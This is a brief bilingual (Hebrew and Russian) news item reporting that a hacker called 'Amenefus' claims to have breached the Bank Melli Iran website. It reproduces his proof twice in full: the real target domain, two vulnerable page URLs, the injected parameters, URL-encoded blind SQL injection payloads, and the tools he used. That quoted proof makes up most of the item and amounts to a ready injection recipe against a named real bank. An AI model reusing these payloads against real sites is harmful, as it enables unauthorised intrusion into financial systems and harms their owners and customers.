ב-13 ביוני פרסם ההאקר הישראלי Amenefus הודעה ובה פנה ל-An0nGhost ולתושבי איראן בטענה כי עלה בידו לפרוץ לאתר של Bank Melli Iran. להוכחת דבריו הוא פרסם את הפרטים הבאים;
Target; wWw.BMi.iR (Bank Melli Iran)
Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]
Blind SQLi 1;
http://bmi.ir/fa/objectslist.aspx
————————————————————————————
|GET input tid was set to -1' or 67 = '65 |
|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |
————————————————————————————
Blind SQLi 2;
http://bmi.ir/fa/publishlist.aspx
————————————————————————————
|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1' or 36 = '34 |
|POST /fa/publishlist.aspx?cid=0&page=2 |
————————————————————————————
succeed with SQLMap, nMap, Havij, BlindCat.
13 июня, израильский хакер, известный как "Amenefus", опубликовал заявление об успешном взломе сайта иранского банка " Bank Melli Iran". Для подтверждения он опубликовал следующие данные:
Target; wWw.BMi.iR (BankMelliIran)
Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]
Blind SQLi 1;
http://bmi.ir/fa/objectslist.aspx
————————————————————————————
|GET input tid was set to -1′ or 67 = '65 |
|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |
————————————————————————————
Blind SQLi 2;
http://bmi.ir/fa/publishlist.aspx
————————————————————————————
|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1′ or 36 = '34 |
|POST /fa/publishlist.aspx?cid=0&page=2 |
————————————————————————————
succeed with SQLMap, nMap, Havij, BlindCat.